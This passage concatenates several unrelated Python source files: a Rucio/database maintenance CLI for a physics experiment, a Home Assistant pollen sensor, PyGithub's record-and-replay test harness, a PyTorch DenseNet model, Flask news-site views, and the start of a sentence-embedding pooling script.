        """Add a replication rule for *did* from one RSE to another and
        register the new datum in the rundoc."""
        number, dtype, did_hash = self._parse_did(did)
        print("Adding a new rule {0} from {1} to {2}".format(did, from_rse, to_rse))
        self._print_did_info(number, dtype, did_hash)

        run = self.db.db.find_one({'number': number})
        self._print_run_status(run)

        # Check that the datum of the sender exists in the DB.
        datum = None
        for d in run['data']:
            if d['type'] == dtype and d['host'] == 'rucio-catalogue' and d['location'] == from_rse:
                datum = d
                break
        if datum is None:
            print('The datum concerning data type {0} and site {1} is missing in the DB. Forced to stop'.format(dtype, from_rse))
            return 0

        # Check the rule status on the sender RSE.
        rucio_rule = self.rc.GetRule(upload_structure=did, rse=from_rse)
        if rucio_rule['state'] != 'OK' and rucio_rule['state'] != 'REPLICATING':
            print('The rule in {0} is neither OK nor REPLICATING. Forced to stop'.format(from_rse))
            return 0

        # Set the new rule (unless --skip_rucio asked for a DB-only update).
        if not self.skip_rucio:
            print("Adding the Rucio rule")
            self.rc.AddConditionalRule(did, from_rse, to_rse, lifetime=None, priority=self.priority)
        else:
            print("Rucio rule is not added")
        rucio_rule = self.rc.GetRule(did, rse=to_rse)

        # Update run status.
        self.db.db.find_one_and_update({'number': number}, {'$set': {'status': 'transferring'}})

        # Add a new datum in the run document, cloned from the sender's one.
        updated_fields = {'host': "rucio-catalogue",
                          'type': dtype,
                          'location': to_rse,
                          'lifetime': rucio_rule['expires'],
                          'status': 'transferring',
                          'did': did,
                          'protocol': 'rucio'
                          }
        data_dict = datum.copy()
        data_dict.update(updated_fields)
        self.db.AddDatafield(run['_id'], data_dict)
        print("Done.")

    def delete_rule(self, did, rse):
        """Delete the Rucio rule of *did* on *rse* and the matching rundoc datum."""
        number, dtype, did_hash = self._parse_did(did)
        print("Deleting the rule {0} from {1}".format(did, rse))
        self._print_did_info(number, dtype, did_hash)
        run = self.db.db.find_one({'number': number})

        # Delete the datum, if it exists in the DB.
        datum = None
        for d in run['data']:
            if d['type'] == dtype and d['host'] == 'rucio-catalogue' and d['location'] == rse:
                datum = d
                break
        if datum is not None:
            self.db.RemoveDatafield(run['_id'], datum)
            print("Datum deleted in DB.")
        else:
            print('There is no datum to delete')

        # Delete the rule, if it exists in Rucio.
        rucio_rule = self.rc.GetRule(upload_structure=did, rse=rse)
        if rucio_rule['exists']:
            self.rc.DeleteRule(rucio_rule['id'])
            print("Rucio rule deleted.")
        else:
            print('There is no Rucio rule to delete')
        print("Done.")

    def delete_db_datum(self, did, site):
        """Delete the rundoc datum of *did* for *site*.

        *site* is either a specific EB machine (e.g. 'eb1') or an RSE name.
        """
        number, dtype, did_hash = self._parse_did(did)
        print("Removing the datum from DB for the DID: {0} and from the site {1}".format(did, site))
        self._print_did_info(number, dtype, did_hash)
        print("Site: {0}".format(site))
        run = self.db.db.find_one({'number': number})

        # An EB site is matched on hostname, an RSE on the rucio location.
        datum = None
        for d in run['data']:
            if 'eb' in site:
                if d['type'] == dtype and site in d['host'] and 'xenon.local' in d['host']:
                    datum = d
                    break
            else:
                if d['type'] == dtype and d['host'] == 'rucio-catalogue' and d['location'] == site:
                    datum = d
                    break
        if datum is not None:
            self.db.RemoveDatafield(run['_id'], datum)
            print("Done.")
        else:
            print('There is no datum. Nothing has been deleted')

    def set_run_status(self, number, status):
        """Set the 'status' field of run *number* to *status*."""
        number = int(number)
        print("Setting the status of run {0} to the value {1}".format(number, status))
        run = self.db.db.find_one({'number': number})
        print("status before = ", run['status'])
        self.db.db.find_one_and_update({'_id': run['_id']}, {'$set': {"status": status}})
        run = self.db.db.find_one({'number': number})
        print("status after = ", run['status'])

    def set_eb_status(self, did, status):
        """Set the status of the EB datum of *did* to *status*."""
        print("Setting the EB status of DID {0} to the value {1}".format(did, status))
        number, dtype, did_hash = self._parse_did(did)
        self._print_did_info(number, dtype, did_hash)
        run = self.db.db.find_one({'number': number})

        # Extract the Event Builder machine which processed this run.
        eb = self._get_eb_host(run)
        if eb is None:
            print('Not processed')
            return 0

        # Get the EB datum and its status.
        datum, ebstatus = self._get_eb_datum(run, dtype, eb)
        if datum is None:
            print('There is no EB datum.')
            return 0
        if ebstatus != "":
            print("EB status before = ", ebstatus)
        else:
            print("EB status absent before")

        # Set the aimed value.
        self.db.db.find_one_and_update(
            {'_id': run['_id'], 'data': {'$elemMatch': datum}},
            {'$set': {'data.$.status': status}})

        # Re-read and confirm the change.
        run = self.db.db.find_one({'number': number})
        datum, ebstatus = self._get_eb_datum(run, dtype, eb)
        print("EB status after = ", ebstatus)

    def __del__(self):
        pass
def main():
    """Entry point of the admix-fix command line utility.

    Parses the command line, builds a Fix instance and dispatches each
    requested action; the options are independent and can be combined.
    """
    parser = ArgumentParser("admix-fix")
    config = Config()

    # (dead commented-out argument definitions removed)
    parser.add_argument("--reset_upload", nargs=1, help="Deletes everything related to a given DID, except data in EB. The deletion includes the entries in the Rucio catalogue and the related data in the DB rundoc. This is ideal if you want to retry an upload that failed", metavar=('DID'))
    parser.add_argument("--add_rule", nargs=3, help="Add a new replication rule of a given DID from one RSE to another one. The rundoc in DB is updated with a new datum as well", metavar=('DID', 'FROM_RSE', 'TO_RSE'))
    parser.add_argument("--delete_rule", nargs=2, help="Delete a replication rule of a given DID from one RSE. The rundoc in DB is deleted as well", metavar=('DID', 'RSE'))
    parser.add_argument("--delete_db_datum", nargs=2, help="Deletes the db datum corresponding to a given DID. The SITE can be either a specific EB machine (ex: eb1) or a specific RSE", metavar=('DID', 'SITE'))
    parser.add_argument("--set_run_status", nargs=2, help="Set the run status to a given NAME (typical case is to set it to eb_ready_to_upload)", metavar=('RUN_NUMBER', 'STATUS_NAME'))
    parser.add_argument("--set_eb_status", nargs=2, help="Set the EB status of a given DID to a given NAME", metavar=('DID', 'STATUS_NAME'))
    parser.add_argument("--priority", type=int, help="Priority to assign to Rucio rules (default: %(default)s)", default=3)
    parser.add_argument("--skip_rucio", help="Add this flag in context of add_rule in case you just want to update DB since Rucio rule exists already", action='store_true')
    args = parser.parse_args()

    # Make the admix configuration path globally visible to the helpers.
    helper.make_global("admix_config", os.path.abspath(config.get('Admix', 'config_file')))

    fix = Fix()
    fix.skip_rucio = args.skip_rucio
    fix.priority = args.priority

    try:
        if args.reset_upload:
            fix.reset_upload(args.reset_upload[0])
        if args.add_rule:
            fix.add_rule(args.add_rule[0], args.add_rule[1], args.add_rule[2])
        if args.delete_rule:
            fix.delete_rule(args.delete_rule[0], args.delete_rule[1])
        if args.delete_db_datum:
            fix.delete_db_datum(args.delete_db_datum[0], args.delete_db_datum[1])
        if args.set_run_status:
            fix.set_run_status(args.set_run_status[0], args.set_run_status[1])
        if args.set_eb_status:
            fix.set_eb_status(args.set_eb_status[0], args.set_eb_status[1])
        print("")
    except KeyboardInterrupt:
        # Allow a clean Ctrl-C during the long sleep in reset_upload.
        return 0
|
import logging
from datetime import timedelta
from homeassistant.components.sensor import SensorEntity
from homeassistant.const import (ATTR_IDENTIFIERS, ATTR_MANUFACTURER,
ATTR_MODEL, ATTR_NAME)
from homeassistant.util.dt import utcnow
from .const import CONF_REGION_ID, DOMAIN
ATTR_VAL_TOMORROW = "state_tomorrow"
ATTR_VAL_IN_2_DAYS = "state_in_2_days"
ATTR_DESC_TODAY = "state_today_desc"
ATTR_DESC_TOMORROW = "state_tomorrow_desc"
ATTR_DESC_IN_2_DAYS = "state_in_2_days_desc"
ATTR_LAST_UPDATE = "last_update"
ATTR_NEXT_UPDATE = "next_update"
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up platform for a new integration.

    Called by the HA framework after async_setup_platforms has been called
    during initialization of a new integration. Creates one sensor entity
    per distinct pollen name in the configured region.
    """
    region_id = config_entry.data[CONF_REGION_ID]
    source = hass.data[DOMAIN].source

    seen_names = set()
    new_entities = []
    for pollen in source.pollen_list:
        if pollen.region_id != region_id or pollen.name in seen_names:
            continue
        seen_names.add(pollen.name)
        new_entities.append(
            PollenflugSensorEntity(hass, source, region_id, pollen.name)
        )
    async_add_entities(new_entities)
class PollenflugSensorEntity(SensorEntity):
    """Common functionality for all pollenflug entities."""

    def __init__(self, hass, source, region_id, pollen_name):
        self._source = source
        self._region_id = region_id
        self._pollen_name = pollen_name
        self._value = None
        self._update_sensor_listener = None

        # Set HA instance attributes directly (don't use property).
        self._attr_unique_id = f"{DOMAIN}_{pollen_name}_{region_id}"
        self._attr_name = f"Pollenflug {pollen_name} {region_id}"
        self._attr_icon = "mdi:flower-pollen"
        self._attr_device_info = {
            ATTR_IDENTIFIERS: {(DOMAIN, region_id)},
            ATTR_NAME: "Pollenflug-Gefahrenindex",
            ATTR_MANUFACTURER: source.sender,
            ATTR_MODEL: source.regions_list[region_id].name,
            "entry_type": "service",
        }

    async def async_update(self):
        """Update the value of the entity."""
        today = utcnow().date()

        # Collect the forecast for today (0) and the next two days (1, 2).
        forecast = {0: None, 1: None, 2: None}
        for pollen in self._source.pollen_list:
            if pollen.region_id != self._region_id:
                continue
            if pollen.name != self._pollen_name:
                continue
            day_offset = (pollen.date - today).days
            if day_offset in forecast:
                forecast[day_offset] = pollen.value

        self._value = forecast[0]
        self._attr_extra_state_attributes = {
            ATTR_VAL_TOMORROW: forecast[1],
            ATTR_VAL_IN_2_DAYS: forecast[2],
            ATTR_DESC_TODAY: self._source.legend.get(forecast[0]),
            ATTR_DESC_TOMORROW: self._source.legend.get(forecast[1]),
            ATTR_DESC_IN_2_DAYS: self._source.legend.get(forecast[2]),
            ATTR_LAST_UPDATE: self._source.last_update,
            ATTR_NEXT_UPDATE: self._source.next_update,
        }
        # Report the last update in the local timezone.
        self._attr_attribution = f"Last update: {self._source.last_update.astimezone()}"

    @property
    def available(self):
        """Return true if value is valid."""
        return self._value is not None

    @property
    def native_value(self):
        """Return the value of the entity."""
        return self._value
|
# -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 <NAME> <<EMAIL>> #
# Copyright 2012 Zearin <<EMAIL>> #
# Copyright 2013 AKFish <<EMAIL>> #
# Copyright 2013 <NAME> <<EMAIL>> #
# #
# This file is part of PyGithub. #
# http://pygithub.github.io/PyGithub/v1/index.html #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import os
import sys
import unittest
import httplib
import traceback
import github
# Feature gates derived from the running interpreter's version
# (hexversion encodes major/minor as 0xMMmm0000).
atLeastPython26 = sys.hexversion >= 0x02060000
atLeastPython3 = sys.hexversion >= 0x03000000
atMostPython32 = sys.hexversion < 0x03030000
# json entered the stdlib in 2.6; fall back to simplejson on 2.5.
if atLeastPython26:
    import json
else:  # pragma no cover (Covered by all tests with Python 2.5)
    import simplejson as json  # pragma no cover (Covered by all tests with Python 2.5)
def readLine(file):
    """Read one line from *file* and return it stripped.

    On Python 3 the replay files are opened in binary mode, so the raw
    bytes are decoded as UTF-8 first; on Python 2 the line is already a
    str and is only stripped.
    """
    line = file.readline()
    if atLeastPython3:
        line = line.decode("utf-8")
    return line.strip()
class FakeHttpResponse:
    """Minimal stand-in for httplib's response object.

    Replay tests construct these from recorded status / headers / body
    data so that the Requester never touches the network.
    """

    def __init__(self, status, headers, output):
        self.status = status
        self.__headers = headers
        self.__output = output

    def getheaders(self):
        """Return the recorded header list."""
        return self.__headers

    def read(self):
        """Return the recorded response body."""
        return self.__output
def fixAuthorizationHeader(headers):
    """Scrub credentials from *headers* in place before they are written
    to (or compared against) a replay file.

    Token and Basic credentials are replaced with fixed placeholders; the
    well-known fake login/password pair is deliberately left untouched.
    """
    if "Authorization" not in headers:
        return
    auth = headers["Authorization"]
    if auth.endswith("ZmFrZV9sb2dpbjpmYWtlX3Bhc3N3b3Jk"):
        # This special case is here to test the real Authorization header
        # sent by PyGithub. It would have avoided issue https://github.com/jacquev6/PyGithub/issues/153
        # because we would have seen that Python 3 was not generating the same
        # header as Python 2
        pass
    elif auth.startswith("token "):
        headers["Authorization"] = "token private_token_<PASSWORD>"
    elif auth.startswith("Basic "):
        headers["Authorization"] = "Basic login_and_password_removed"
class RecordingConnection: # pragma no cover (Class useful only when recording new tests, not used during automated tests)
    """Proxy around a real httplib connection that writes every exchange
    (protocol, verb, host, port, url, headers, body, then the response)
    to a replay file, one field per line, so ReplayingConnection can play
    the session back offline. This file is Python 2 code (print statements).
    """
    def __init__(self, file, protocol, host, port, *args, **kwds):
        self.__file = file
        self.__protocol = protocol
        self.__host = host
        # Stored as text because every field is written to a text replay file.
        self.__port = str(port)
        # _realConnection is supplied by the HTTP/HTTPS subclasses below.
        self.__cnx = self._realConnection(host, port, *args, **kwds)
    def request(self, verb, url, input, headers):
        # Echo the outgoing request for the person doing the recording.
        print verb, url, input, headers,
        self.__cnx.request(verb, url, input, headers)
        # Credentials are scrubbed only in the recorded copy; the real
        # request above already went out with the original headers.
        fixAuthorizationHeader(headers)
        self.__writeLine(self.__protocol)
        self.__writeLine(verb)
        self.__writeLine(self.__host)
        self.__writeLine(self.__port)
        self.__writeLine(url)
        self.__writeLine(str(headers))
        # Bodies are flattened to a single line to fit the line-based format.
        self.__writeLine(input.replace('\n', '').replace('\r', ''))
    def getresponse(self):
        res = self.__cnx.getresponse()
        status = res.status
        print "=>", status
        headers = res.getheaders()
        output = res.read()
        self.__writeLine(str(status))
        self.__writeLine(str(headers))
        self.__writeLine(str(output))
        # Hand back a replay-compatible response so both modes behave alike.
        return FakeHttpResponse(status, headers, output)
    def close(self):
        # A blank line marks the end of one request/response exchange.
        self.__writeLine("")
        return self.__cnx.close()
    def __writeLine(self, line):
        self.__file.write(line + "\n")
class RecordingHttpConnection(RecordingConnection): # pragma no cover (Class useful only when recording new tests, not used during automated tests)
    """RecordingConnection speaking plain HTTP."""
    _realConnection = httplib.HTTPConnection
    def __init__(self, file, *args, **kwds):
        RecordingConnection.__init__(self, file, "http", *args, **kwds)
class RecordingHttpsConnection(RecordingConnection): # pragma no cover (Class useful only when recording new tests, not used during automated tests)
    """RecordingConnection speaking HTTPS."""
    _realConnection = httplib.HTTPSConnection
    def __init__(self, file, *args, **kwds):
        RecordingConnection.__init__(self, file, "https", *args, **kwds)
class ReplayingConnection:
    """Replays a recorded HTTP exchange: each request is asserted against
    the next record in the replay file (written by RecordingConnection)
    and the recorded response is returned, so tests run offline.
    """
    def __init__(self, testCase, file, protocol, host, port, *args, **kwds):
        self.__testCase = testCase
        self.__file = file
        self.__protocol = protocol
        self.__host = host
        # Stored as text to match what RecordingConnection wrote.
        self.__port = str(port)
    def request(self, verb, url, input, headers):
        # Scrub credentials so they compare equal to the sanitized recording.
        fixAuthorizationHeader(headers)
        self.__testCase.assertEqual(self.__protocol, readLine(self.__file))
        self.__testCase.assertEqual(verb, readLine(self.__file))
        self.__testCase.assertEqual(self.__host, readLine(self.__file))
        self.__testCase.assertEqual(self.__port, readLine(self.__file))
        self.__testCase.assertEqual(self.__splitUrl(url), self.__splitUrl(readLine(self.__file)))
        # eval() on the recorded header dict: replay files are trusted fixtures.
        self.__testCase.assertEqual(headers, eval(readLine(self.__file)))
        expectedInput = readLine(self.__file)
        if input.startswith("{"):
            # JSON bodies are compared structurally, not textually.
            self.__testCase.assertEqual(json.loads(input.replace('\n', '').replace('\r', '')), json.loads(expectedInput))
        elif atMostPython32: # @todo Test in all cases, including Python 3.3
            # In Python 3.3, dicts are not output in the same order as in Python 2.5 -> 3.2.
            # So, form-data encoding is not deterministic and is difficult to test.
            self.__testCase.assertEqual(input.replace('\n', '').replace('\r', ''), expectedInput)
    def __splitUrl(self, url):
        # Compare query strings order-insensitively: (base, sorted params).
        splitedUrl = url.split("?")
        if len(splitedUrl) == 1:
            return splitedUrl
        self.__testCase.assertEqual(len(splitedUrl), 2)
        base, qs = splitedUrl
        return (base, sorted(qs.split("&")))
    def getresponse(self):
        status = int(readLine(self.__file))
        # eval() reconstructs the recorded header list; trusted fixture data.
        headers = eval(readLine(self.__file))
        output = readLine(self.__file)
        return FakeHttpResponse(status, headers, output)
    def close(self):
        # Consume the blank line that terminates the recorded exchange.
        readLine(self.__file)
def ReplayingHttpConnection(testCase, file, *args, **kwds):
    """Factory matching the recording HTTP connection signature, for replay mode."""
    return ReplayingConnection(testCase, file, "http", *args, **kwds)
def ReplayingHttpsConnection(testCase, file, *args, **kwds):
    """Factory matching the recording HTTPS connection signature, for replay mode."""
    return ReplayingConnection(testCase, file, "https", *args, **kwds)
class BasicTestCase(unittest.TestCase):
    """Base class for PyGithub tests: wires the Requester to either a
    recording connection (record mode, talks to the real API) or a
    replaying connection (default, reads fixtures from ReplayData/).
    """
    # Class-level switches, toggled by activateRecordMode()/activateTokenAuthMode().
    recordMode = False
    tokenAuthMode = False
    def setUp(self):
        unittest.TestCase.setUp(self)
        self.__fileName = ""
        self.__file = None
        if self.recordMode: # pragma no cover (Branch useful only when recording new tests, not used during automated tests)
            github.Requester.Requester.injectConnectionClasses(
                lambda ignored, *args, **kwds: RecordingHttpConnection(self.__openFile("wb"), *args, **kwds),
                lambda ignored, *args, **kwds: RecordingHttpsConnection(self.__openFile("wb"), *args, **kwds)
            )
            import GithubCredentials
            self.login = GithubCredentials.login
            # NOTE(review): "<PASSWORD>" below looks like a redaction placeholder
            # (presumably GithubCredentials.password) -- restore before running
            # in record mode.
            self.password = <PASSWORD>
            self.oauth_token = GithubCredentials.oauth_token
            # @todo Remove client_id and client_secret from ReplayData (as we already remove login, password and oauth_token)
            # self.client_id = GithubCredentials.client_id
            # self.client_secret = GithubCredentials.client_secret
        else:
            github.Requester.Requester.injectConnectionClasses(
                lambda ignored, *args, **kwds: ReplayingHttpConnection(self, self.__openFile("rb"), *args, **kwds),
                lambda ignored, *args, **kwds: ReplayingHttpsConnection(self, self.__openFile("rb"), *args, **kwds)
            )
            # Dummy credentials: the replay fixtures were sanitized to match these.
            self.login = "login"
            self.password = "password"
            self.oauth_token = "oauth_token"
            self.client_id = "client_id"
            self.client_secret = "client_secret"
    def tearDown(self):
        unittest.TestCase.tearDown(self)
        self.__closeReplayFileIfNeeded()
        github.Requester.Requester.resetConnectionClasses()
    def __openFile(self, mode):
        # Walk the current stack to find the test (or setUp/tearDown) being
        # executed; the replay file is named "<Class>.<function>.txt".
        for (_, _, functionName, _) in traceback.extract_stack():
            if functionName.startswith("test") or functionName == "setUp" or functionName == "tearDown":
                if functionName != "test": # because in class Hook(Framework.TestCase), method testTest calls Hook.test
                    fileName = os.path.join(os.path.dirname(__file__), "ReplayData", self.__class__.__name__ + "." + functionName + ".txt")
        if fileName != self.__fileName:
            self.__closeReplayFileIfNeeded()
            self.__fileName = fileName
            self.__file = open(self.__fileName, mode)
        return self.__file
    def __closeReplayFileIfNeeded(self):
        if self.__file is not None:
            if not self.recordMode: # pragma no branch (Branch useful only when recording new tests, not used during automated tests)
                # The replay file must have been consumed completely.
                self.assertEqual(readLine(self.__file), "")
            self.__file.close()
    def assertListKeyEqual(self, elements, key, expectedKeys):
        """Assert that key(e) over *elements* equals *expectedKeys* exactly."""
        realKeys = [key(element) for element in elements]
        self.assertEqual(realKeys, expectedKeys)
    def assertListKeyBegin(self, elements, key, expectedKeys):
        """Assert that key(e) over the first len(expectedKeys) elements matches."""
        realKeys = [key(element) for element in elements[: len(expectedKeys)]]
        self.assertEqual(realKeys, expectedKeys)
class TestCase(BasicTestCase):
    """BasicTestCase plus an authenticated Github client (self.g) and
    per-object header "frame" checking enabled on the Requester."""
    def doCheckFrame(self, obj, frame):
        # Tolerate the two equivalent "no headers" encodings.
        if obj._headers == {} and frame is None:
            return
        if obj._headers is None and frame == {}:
            return
        # frame[2] holds the headers the object was created from.
        self.assertEqual(obj._headers, frame[2])
    def getFrameChecker(self):
        # Callback signature imposed by Requester.setOnCheckMe.
        return lambda requester, obj, frame: self.doCheckFrame(obj, frame)
    def setUp(self):
        BasicTestCase.setUp(self)
        # Set up frame debugging
        github.GithubObject.GithubObject.setCheckAfterInitFlag(True)
        github.Requester.Requester.setDebugFlag(True)
        github.Requester.Requester.setOnCheckMe(self.getFrameChecker())
        if self.tokenAuthMode:
            self.g = github.Github(self.oauth_token)
        else:
            self.g = github.Github(self.login, self.password)
def activateRecordMode(): # pragma no cover (Function useful only when recording new tests, not used during automated tests)
    """Make all subsequent test cases record against the real GitHub API."""
    BasicTestCase.recordMode = True
def activateTokenAuthMode(): # pragma no cover (Function useful only when recording new tests, not used during automated tests)
    """Make all subsequent test cases authenticate with an OAuth token."""
    BasicTestCase.tokenAuthMode = True
|
# -*- coding: UTF-8 -*-
"""
An unofficial implementation of DenseNet with pytorch
@<NAME> 2020_09_15
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
from models.blocks.conv_bn import BN_Conv2d
from models.blocks.dense_block import DenseBlock, CSP_DenseBlock
class DenseNet(nn.Module):
    """DenseNet with optional CSP (cross-stage-partial) dense blocks.

    layers: number of dense layers in each of the dense blocks.
    k: growth rate (feature maps added per dense layer).
    theta: compression factor applied by each transition layer.
    part_ratio: 0 selects the plain DenseBlock; any other value selects
        CSP_DenseBlock.
    """
    def __init__(self, layers: list, k: int, theta: float, num_classes: int, part_ratio: float = 0) -> None:
        super(DenseNet, self).__init__()
        # params
        self.layers = layers
        self.k = k
        self.theta = theta
        # The block type is selected via the part_ratio parameter.
        # NOTE(review): part_ratio itself is not forwarded to CSP_DenseBlock,
        # so the CSP split presumably uses that class's default -- confirm.
        self.Block = DenseBlock if part_ratio == 0 else CSP_DenseBlock
        # layers
        self.conv = BN_Conv2d(3, 2 * k, 7, 2, 3)  # stem: 7x7 stride-2 conv
        self.blocks, patches = self.__make_blocks(2 * k)
        self.fc = nn.Linear(patches, num_classes)
    def __make_transition(self, in_chls):
        # Transition: 1x1 conv compresses channels by theta, then 2x2
        # average pooling halves the spatial resolution.
        out_chls = int(self.theta * in_chls)
        return nn.Sequential(
            BN_Conv2d(in_chls, out_chls, 1, 1, 0),
            nn.AvgPool2d(2)
        ), out_chls
    def __make_blocks(self, k0):
        """
        make block-transition structures
        :param k0: channels entering the first dense block
        :return: (nn.Sequential of blocks/transitions, channels out of the last block)
        """
        layers_list = []
        patches = 0
        for i in range(len(self.layers)):
            layers_list.append(self.Block(k0, self.layers[i], self.k))
            patches = k0 + self.layers[i] * self.k  # output feature patches from Dense Block
            if i != len(self.layers) - 1:
                # No transition after the final dense block.
                transition, k0 = self.__make_transition(patches)
                layers_list.append(transition)
        return nn.Sequential(*layers_list), patches
    def forward(self, x):
        out = self.conv(x)
        out = F.max_pool2d(out, 3, 2, 1)
        # print(out.shape)
        out = self.blocks(out)
        # print(out.shape)
        # 7x7 average pooling acts as global pooling for 224x224 inputs.
        out = F.avg_pool2d(out, 7)
        # print(out.shape)
        out = out.view(out.size(0), -1)
        # out = F.softmax(self.fc(out))
        out = self.fc(out)
        return out
def densenet_121(num_classes=1000):
    """DenseNet-121: dense blocks of 6/12/24/16 layers, growth rate 32."""
    return DenseNet([6, 12, 24, 16], k=32, theta=0.5, num_classes=num_classes)
def densenet_169(num_classes=1000):
    """DenseNet-169: dense blocks of 6/12/32/32 layers, growth rate 32."""
    return DenseNet([6, 12, 32, 32], k=32, theta=0.5, num_classes=num_classes)
def densenet_201(num_classes=1000):
    """DenseNet-201: dense blocks of 6/12/48/32 layers, growth rate 32."""
    return DenseNet([6, 12, 48, 32], k=32, theta=0.5, num_classes=num_classes)
def densenet_264(num_classes=1000):
    """DenseNet-264: dense blocks of 6/12/64/48 layers, growth rate 32."""
    return DenseNet([6, 12, 64, 48], k=32, theta=0.5, num_classes=num_classes)
def csp_densenet_121(num_classes=1000):
    """CSP variant of DenseNet-121 (part_ratio=0.5)."""
    return DenseNet([6, 12, 24, 16], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
def csp_densenet_169(num_classes=1000):
    """CSP variant of DenseNet-169 (part_ratio=0.5)."""
    return DenseNet([6, 12, 32, 32], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
def csp_densenet_201(num_classes=1000):
    """CSP variant of DenseNet-201 (part_ratio=0.5)."""
    return DenseNet([6, 12, 48, 32], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
def csp_densenet_264(num_classes=1000):
    """CSP variant of DenseNet-264 (part_ratio=0.5)."""
    return DenseNet([6, 12, 64, 48], k=32, theta=0.5, num_classes=num_classes, part_ratio=0.5)
# def test():
# net = densenet_264()
# summary(net, (3, 224, 224))
# x = torch.randn((2, 3, 224, 224))
# y = net(x)
# print(y.shape)
#
#
# test()
|
<gh_stars>0
from flask import render_template,request,redirect,url_for
from . import main
from ..requests import get_news,get_article,search_news,source_news
from ..models import Article,News
@main.route('/')
def index():
    '''
    Root view: renders the landing page with business headlines, or
    redirects to the search view when a ``query`` request argument is
    supplied.
    '''
    news = get_article('business')
    title = 'Welcome to The news highlight'
    # Bug fix: the original local was named ``search_news``, shadowing the
    # imported ``search_news`` helper from ..requests within this function.
    search_query = request.args.get('query')
    if search_query:
        return redirect(url_for('.search', query=search_query))
    else:
        return render_template('index.html', title=title, article=news)
@main.route('/sports')
def sport():
    '''
    Render the sports page with the latest sports headlines.
    '''
    sport = get_article('sports')
    title = 'general-news Page - Get The latest News Online'
    return render_template('sports.html',title = title,article=sport)
@main.route('/technology')
def tech():
    '''
    Render the technology page with the latest technology headlines.
    '''
    technology = get_article('technology')
    title = 'general-news Page - Get The latest News Online'
    return render_template('technology.html',title = title,article=technology)
@main.route('/business')
def business():
    '''
    Render the business page with the latest business headlines.
    '''
    business = get_article('business')
    title = 'general-news Page - Get The latest News Online'
    return render_template('business.html',title = title,article=business)
@main.route('/entertainment')
def entertainment():
    '''
    Render the entertainment page with the latest entertainment headlines.
    '''
    # Getting popular news
    entertainment = get_article('entertainment')
    title = 'general-news Page - Get The latest News Online'
    return render_template('entertainment.html',title = title,article=entertainment)
@main.route('/search/<query>')
def search(query):
    '''
    Display news articles matching *query*.

    The query words are joined with "+" so they can be passed to the news
    API as a single search term.
    '''
    article_list = query.split(" ")
    query_format = "+".join(article_list)
    searched_articles = search_news(query_format)
    title = f'search results for {query}'
    # Bug fix: ``title`` was computed but never passed to the template;
    # forward it like every other view in this module does.
    return render_template('search.html', title=title, article=searched_articles)
@main.route('/nation')
def nation():
    '''
    Render articles sourced from Daily Nation (nation.co.ke).
    '''
    nation = source_news('nation.co.ke')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=nation)
@main.route('/standard')
def standard():
    '''
    Render articles sourced from The Standard (standardmedia.co.ke).
    '''
    standard = source_news('standardmedia.co.ke')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=standard)
@main.route('/cnn')
def cnn():
    '''
    Render articles sourced from CNN (cnn.com).
    '''
    cnn = source_news('cnn.com')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=cnn)
@main.route('/bbc')
def bbc():
    '''
    Render articles sourced from the BBC (bbc.com).
    '''
    bbc = source_news('bbc.com')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=bbc)
@main.route('/theeast')
def east():
    '''
    Render articles sourced from The East African (theeastafrican.co.ke).
    '''
    ea = source_news('theeastafrican.co.ke')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=ea)
@main.route('/aljazeera')
def aljazeera():
    '''
    Render articles sourced from Al Jazeera (aljazeera.com).
    '''
    aljazeera = source_news('aljazeera.com')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=aljazeera)
@main.route('/forbes')
def forbes():
    '''
    Render articles sourced from Forbes (forbes.com).
    '''
    forbes = source_news('forbes.com')
    title = 'general-news Page - Get The latest News Online'
    return render_template('articles.html',title = title,article=forbes)
|
<filename>create_sentence_representation.py<gh_stars>1-10
import torch
import sys
import numpy as np
import scipy.io
import pickle
import os
from get_dict import get_missing, get_missing_counts, find_missing_sentences, update_dict
import argparse
def process_sentence(vocab, typ, num_layers):
    """Pool per-token embeddings into one vector per sentence and layer.

    Parameters
    ----------
    vocab : list
        Sentences; each sentence is a list of tokens, and each token is a
        list of per-layer embedding vectors (``token[layer]`` is 1-D).
    typ : str
        Pooling method: "avg", "max", "min" or "last".
    num_layers : int
        Number of layers recorded for every token.

    Returns
    -------
    list
        ``sentence_rep[layer][sentence]`` is the pooled numpy vector.

    Raises
    ------
    ValueError
        If *typ* is not one of the supported pooling methods (the
        original code silently produced empty per-layer lists instead).
    """
    # Map each pooling name to a reducer over a layer's token vectors.
    poolers = {
        "avg": lambda vecs: np.mean(vecs, axis=0),
        "max": lambda vecs: np.array(vecs).max(axis=0),
        "min": lambda vecs: np.array(vecs).min(axis=0),
        "last": lambda vecs: np.array(vecs[-1]),
    }
    if typ not in poolers:
        raise ValueError("unknown pooling type: %r" % (typ,))
    pool = poolers[typ]
    nsentences = len(vocab)
    print("number of sentences: " + str(nsentences))
    print('mixing sentences...')
    sentence_rep = [[] for _ in range(num_layers)]
    for sen in vocab:
        # Collect, per layer, the embedding of every token in the sentence.
        one_sent = [[] for _ in range(num_layers)]
        for token in sen:
            for layer in range(len(token)):
                one_sent[layer].append(np.array(token[layer]))
        for lay in range(len(one_sent)):
            sentence_rep[lay].append(pool(one_sent[lay]))
    return sentence_rep
def save_to_mat(title, arr, bool_labels, method):
    """Write one MATLAB .mat file per layer.

